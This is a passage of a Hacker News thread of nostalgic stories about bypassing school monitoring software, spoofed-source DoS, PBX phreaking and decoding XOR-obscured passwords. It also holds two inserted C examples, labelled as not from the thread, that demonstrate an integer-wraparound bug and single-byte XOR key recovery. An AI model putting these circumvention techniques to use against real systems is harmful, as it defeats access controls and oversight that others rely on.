This would let you boot into safe mode, circumventing the | remote monitoring and permissions software they had in place, and | make your user account an administrator. Boom, games were back. I | mostly used it to be able to work on software projects, of | course, but I did end up playing a bit of Advance Wars. | | I can't remember now but there was some issue where this didn't | persist for very long -- maybe there were updates that the remote | monitoring system would send that would reset your admin status? | -- so you would have to go through the whole PRAM reset | rigamarole, with a screwdriver, and that was a pain in the ass. I | was out of school for a while my senior spring due to the flu and | I figured out a way to totally disable the remote management | software. | | This was great, and I was having an awesome time working on | software that would eventually get me my first programming job | while I should have been focusing in class, when I got called | down to the principal's office, where I was accused of being a | computer hacker. I of course denied it, but they said that it | certainly was odd that my computer had stopped communicating with | the remote management software entirely. I think because I was so | close to graduating and actually hadn't done anything wrong I got | away with a week of detention and a firm promise to not do | anything of the sort ever again. | | Around that same time it had come out that certain administrators | at the school were misusing the remote management software's | features to spy on high school students in their own homes, which | was pretty absurd and of course a huge and expensive debacle, so | I think they were somewhat more sympathetic to me disabling it | than they might have been otherwise. | | https://en.wikipedia.org/wiki/Robbins_v._Lower_Merion_School... | peter_l_downs wrote: | Oh, one other fun thing.
We had a schoolday that ended with a | 30 minute activity period where every student had to sign up on | some web interface to a different teacher's room. This was so | that you could get help, meet with teachers, project groups, | whatever if you needed it. But there were limited spots in each | teacher's periods and you needed to sign up in advance, with no | more signups allowed after noon on the same day. I took a look | at the web interface and realized that all the checks were | client-side, so I wrote a little script that would let me sign | up for any activity period, at any time, even during the | activity periods. It was good fun being able to switch periods | at the end of the day, and seeing teachers being confused after | they had called attendance, checked me in to their room, and | then seeing me drop off the attendance and show up somewhere | else. Gave me a free pass to go wherever I wanted which was | nice. | Pick-A-Hill2019 wrote: | I took a look at that link (Robbins v. Lower Merion School | District) and - Wow, remotely activating students webcams in | their own bedrooms is ... just ... SMH. I hope I am wrong but | as far as I can tell, no-one went to jail for it?? Dayamn! | __MatrixMan__ wrote: | In my middle school you could just x out of the Windows NT login | window and get a userless session. | | We didn't understand that we hadn't hacked anything, and neither | did our teachers. Their misplaced awe at our ability to cloak our | activities in anonymity was intoxicating. | | Most of my cohort then are engineers now. | | I worry that as security gets better, opportunities for | creativity and exploration go away, which might not bode well for | future generations. | tester756 wrote: | Don't worry | | If you're into real world security / reverse engineering and | other stuff, then try CTFs, other strong people will ensure | that you'll have enough room for creativity and hacky hacks :) | jamal-kumar wrote: | I think about this alot too. 
Tons of the current tutorials on | learning how to break Windows security teach you on an old | Windows 7 VM just to make it easy to get around mitigations and | learn without hindrance. I mean I know I learned on Windows XP | VMs... but what happens when Microsoft rescinds offering those | free Windows 7 IE11 VMs any arbitrary time soon? | | On the other hand I like how Microsoft actually seems to be | giving a damn these days. | grawprog wrote: | In university, for some strange reason, we were required to | spend a few hours in a 'learn how to use a search engine | class.' It was brutal, they used remote control software and | slowly and painfully taught us how to use Google. | | I figured out pretty quickly you could Ctrl-Alt-Delete to bring | up the task manager and just close the client on the computer I | was using. | | The teacher never figured out why one of the computers vanished | off the remote software management screen she was using. | nogridbag wrote: | Yeah I also got a bit too creative in middle and high school. | It was all harmless fun, e.g. writing scripts so that various | computers would start beeping at random times during the day. | | None of my school faculty had any understanding of computers. I | was even yelled at for using "Google" during a research | project. | | I think the bigger fear is that people cannot make mistakes | anymore. Even in my local town a simple mistake went viral on | social media and now the student's whole life is ruined for | something that may have been a simple visit to the principal's | office back in the day. | liketochill wrote: | I did a school project where I DoS'd a local ISP for 10 seconds | using broadcast amplifiers on misconfigured routers that | allowed the source address to be spoofed. I was probably 15? | The ISP I think only had a T3 but most people were still on | dial up so overwhelming a T3 seemed like a big deal. | | I miss having shell accounts at all the .edu's for my eggdrop | bots.
That is how I learned about all the US schools hah | twox2 wrote: | It's a moving target. The opportunities for kids to get | creative and explore are now in emerging technologies, but they | are "emerging" only to us old farts. To young people, it's just | what's there. I think these things come easy to the inquisitive | minds that are not tainted by what you can and can't. | | For example, I often read bug bounty write-ups, many of which | are obviously written by young teenagers. Some of them are able | to find issues that appear to be hiding in plain sight. I kind | of think that what you're describing is a matter of | perspective, but boy do I miss the good old days when | everything was easy to exploit. | Zenst wrote: | My earlier hack was an ICL 2903 running George OS, involved | creating a large file in an area previously used for the system journal | and could then dump that file out and read the content of the | system journal and that was how I got the admin password. Other | one I did was in effect a keylogger that I ran on the system that | would take control of the terminal it was directed to and | present login, take the input and then pass it to the system making | the user oblivious. | | But for practical use, the old 0800 free calls trick of the early | 80's was probably my most favourite. Back then they introduced 0800 | free calls, when landline calls in the UK weren't cheap. These got | used for marketing, so companies would have their 0800 sales etc. | Now, outside office hours they would direct to a recorded message | on the PBX. Then what you could do is after the message, if you | stayed on the line it would drop you into the exchange and you | then pressed 9 on the tone dial pad and could dial any number you | liked as if you were dialling from that exchange location. Most | being in London so was nice for free calls. Had limited use for | BBS access, case of all that routing and line quality at times as | well as initial set-up. But still fun.
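The "transfer -1" bug thedougd describes further up the thread (a BBS game accepting a negative transfer so that the recipient's unsigned balance wraps to roughly 2^32) is the classic signed-input-into-unsigned-counter mistake. The following is an added example in C, not code from the thread or from any real BBS door game: the player names, balances and the `transfer_unchecked`/`transfer_checked` functions are constructed for the demo. It shows the unchecked transfer wrapping a broke recipient to 4294967295 (the 32-bit wrap the commenter remembers as 4294967296), and a checked version that rejects non-positive amounts, amounts the sender cannot cover, and amounts that would overflow the recipient.

```c
/* Added example (not code from the thread): the unsigned-wraparound
 * "transfer -1" bug, beside a checked transfer. Player names and
 * balances are made up for the demo. */
#include <errno.h>
#include <limits.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

struct player {
    char name[16];
    uint32_t balance; /* game money kept as an unsigned 32-bit counter */
};

/* Parse the typed amount the way a door game of the era might have:
 * strtol happily accepts a leading '-', so "-1" parses to -1.
 * Returns LONG_MIN as a "not a number" sentinel. */
static long parse_amount(const char *text) {
    char *end = NULL;
    errno = 0;
    long v = strtol(text, &end, 10);
    if (errno != 0 || end == text || *end != '\0')
        return LONG_MIN;
    return v;
}

/* Vulnerable: no validation at all. A negative amount is folded into the
 * unsigned balances, which wrap modulo 2^32 instead of failing. */
static void transfer_unchecked(struct player *from, struct player *to, long amount) {
    from->balance -= (uint32_t)amount; /* sender gains 1 when amount == -1 */
    to->balance += (uint32_t)amount;   /* 0 + (uint32_t)-1 == 4294967295 */
}

enum xfer_result { XFER_OK = 0, XFER_BAD_AMOUNT, XFER_INSUFFICIENT, XFER_OVERFLOW };

/* Hardened: reject non-positive or out-of-range amounts, amounts the sender
 * cannot cover, and amounts that would wrap the recipient's balance. */
static enum xfer_result transfer_checked(struct player *from, struct player *to, long amount) {
    if (amount <= 0 || (unsigned long)amount > UINT32_MAX)
        return XFER_BAD_AMOUNT;
    uint32_t amt = (uint32_t)amount;
    if (amt > from->balance)
        return XFER_INSUFFICIENT;
    if (amt > UINT32_MAX - to->balance)
        return XFER_OVERFLOW;
    from->balance -= amt;
    to->balance += amt;
    return XFER_OK;
}

/* Replays the prank: a broke underdog receives "-1" from a player holding 10. */
static uint32_t demo_wraparound(void) {
    struct player rich = { "sysop", 10 }, poor = { "newbie", 0 };
    transfer_unchecked(&rich, &poor, parse_amount("-1"));
    return poor.balance; /* wraps to 4294967295 */
}

/* Same input against the checked transfer: rejected before any balance moves. */
static enum xfer_result demo_checked(void) {
    struct player rich = { "sysop", 10 }, poor = { "newbie", 0 };
    return transfer_checked(&rich, &poor, parse_amount("-1"));
}

int main(void) {
    printf("unchecked: newbie now has %u\n", demo_wraparound());
    printf("checked: result code %d (1 = bad amount)\n", (int)demo_checked());
    return 0;
}
```

The overflow check is written as `amt > UINT32_MAX - to->balance` rather than `to->balance + amt < to->balance` so that the comparison itself can never wrap; the same shape applies to any inventory, credit or counter field that is updated from user input.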
| fatnoah wrote: | It wasn't just the '80s. Things persisted into the mid '90s as | well. | - Pirate FTP sites were in plain sight with | folders named with unprintable ASCII characters | - My | college-provided Telnet client for Windows included a backdoor | FTP server with a plaintext user name and easily brute-forced | password (unsalted hash that turned out to be a birthday of a | school admin) | - Admins had to resolve our network issues by | connecting to the network via modem, from our computers. Of course the | terminal program had keylogging enabled... | - Open SMTP | relay was widespread and everywhere. Spoofing and forging was as | easy as a little Telnet and HELO | flatiron wrote: | 90s I got suspended for "hacking" when all I did was create a | Windows file share. Had me and my friends split the typing | assignments and combine them on the share so we could browse the | internet during typing class. | pdkl95 wrote: | In high school "AP CS" class in the early 90s, a friend of mine | was annoyed at the stupid "security" software the school | installed on the macs (System 7). It was basically just a system | extension that asked for a password on startup. | | Poking around, my friend noticed a slightly hidden/obscured file | that had a file size that matched the number of characters in the | password. N char password, N byte file. The file didn't have the | password in plaintext, so my friend asked the teacher for a common | way to scramble a byte. The teacher quickly suggested, "XOR?" | | So my friend decided to try XORing the bytes in the file with a | few values to see what happened. His _first guess_ was right: the | password was "obscured" with: for (char *p = | password_str; *p != '\0'; p++) { *p ^= 0xC9; } | | Why did he guess 0xC9? He was a total Trekkie/Trekker. 0xC9 in | binary is 11001001. | | https://memory-alpha.fandom.com/wiki/11001001_%28episode%29 | | I guess we know what show the author of the "security software" | likes to watch...
| | Epilogue: my friend quickly did the obvious thing and made a boot | floppy with a small program that printed out the password, so we | had access to most of the computers in the school _and_ discovered | all the passwords we weren't supposed to know. I think we only | used that to play bolo (early tank proto-battle-royale). | _However_... several years later in my first year at university, | I happened to talk to someone attending the local high school. | They had a copy of my friend's boot floppy! I know we never | bothered to upload it to a BBS, but somehow it ended up in the hands | of quite a few high school hackers in multiple cities. | Communitivity wrote: | Nice. This brings back a very fuzzy memory. I think I found at | one point the 'software developer switch', a physical trigger | for the NMI, was still in the software in the form of flower G, | and would pop you into a debugger. I think.. the memory is very | fuzzy, as it's been 30+ years since high school. ___________________________________________________________________ (page generated 2021-06-30 23:01 UTC)
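The single-byte XOR "obscuring" pdkl95 describes above (an N-byte file holding an N-character password, each byte XORed with 0xC9) is recoverable without the lucky Trek guess: the key space is 256 values, so you try them all and keep the one whose output looks most like text, or take one guessed plaintext byte and XOR it with the corresponding file byte. The following is an added example in C, not the friend's boot-floppy program or the school's software: the sample password "makeitso" is made up for the demo, the 0xC9 key is the one from the story, and `PASSWORD_FILE` is the constructed eight-byte file that results. The letter-frequency scorer is a general single-byte-XOR key recovery, which goes beyond the one guess in the story.

```c
/* Added example, not from the thread: recovering a single-byte XOR key from
 * an "obscured" password file. Password and file bytes are constructed. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Apply a one-byte XOR key over n bytes; the scheme is its own inverse. */
static void xor_bytes(unsigned char *dst, const unsigned char *src, size_t n, unsigned char key) {
    for (size_t i = 0; i < n; i++)
        dst[i] = src[i] ^ key;
}

/* Approximate English letter frequencies (percent), a..z. */
static const double FREQ[26] = {
    8.2, 1.5, 2.8, 4.3, 12.7, 2.2, 2.0, 6.1, 7.0, 0.15, 0.77, 4.0, 2.4,
    6.7, 7.5, 1.9, 0.095, 6.0, 6.3, 9.1, 2.8, 0.98, 2.4, 0.15, 2.0, 0.074 };

/* Score a candidate plaintext: lowercase letters by frequency, uppercase at
 * half weight, digits a little, other printable ASCII nothing, and any byte
 * outside printable ASCII a heavy penalty. */
static double english_score(const unsigned char *buf, size_t n) {
    double s = 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = buf[i];
        if (c >= 'a' && c <= 'z')      s += FREQ[c - 'a'];
        else if (c >= 'A' && c <= 'Z') s += FREQ[c - 'A'] / 2;
        else if (c >= '0' && c <= '9') s += 1.0;
        else if (c < 0x20 || c > 0x7e) s -= 10.0;
    }
    return s;
}

/* Try all 256 keys and return the one whose output looks most like English. */
static unsigned char recover_key(const unsigned char *cipher, size_t n) {
    unsigned char plain[256]; /* more than enough for a password-sized file */
    unsigned char best = 0;
    double best_score = -1e9;
    if (n > sizeof plain) n = sizeof plain;
    for (int k = 0; k < 256; k++) {
        xor_bytes(plain, cipher, n, (unsigned char)k);
        double s = english_score(plain, n);
        if (s > best_score) { best_score = s; best = (unsigned char)k; }
    }
    return best;
}

/* Known-plaintext shortcut: one correctly guessed byte gives the key outright. */
static unsigned char key_from_guess(unsigned char cipher_byte, unsigned char plain_guess) {
    return cipher_byte ^ plain_guess;
}

/* Constructed "password file": "makeitso" XOR 0xC9. Eight bytes, no
 * terminator, matching the N-char password / N-byte file observation. */
static const unsigned char PASSWORD_FILE[8] = {
    0xA4, 0xA8, 0xA2, 0xAC, 0xA0, 0xBD, 0xBA, 0xA6 };

/* Decode the sample file with the recovered key; returns a C string. */
static const char *decode_sample(void) {
    static unsigned char out[sizeof PASSWORD_FILE + 1];
    unsigned char key = recover_key(PASSWORD_FILE, sizeof PASSWORD_FILE);
    xor_bytes(out, PASSWORD_FILE, sizeof PASSWORD_FILE, key);
    out[sizeof PASSWORD_FILE] = '\0';
    return (const char *)out;
}

int main(void) {
    unsigned char key = recover_key(PASSWORD_FILE, sizeof PASSWORD_FILE);
    printf("brute-forced key: 0x%02X, password: %s\n", key, decode_sample());
    printf("key from guessing the first byte is 'm': 0x%02X\n",
           key_from_guess(PASSWORD_FILE[0], 'm'));
    return 0;
}
```

On an eight-byte file several keys produce all-printable output (XOR with 0x01 turns "makeitso" into "lbjdhurn"), which is why the scorer weights letters by frequency instead of just checking printability; with a longer file the margin only grows. The lesson for the page's topic is the one the story already makes: a fixed XOR key is encoding, not encryption, and a 256-way loop beats any password-hiding scheme of that kind.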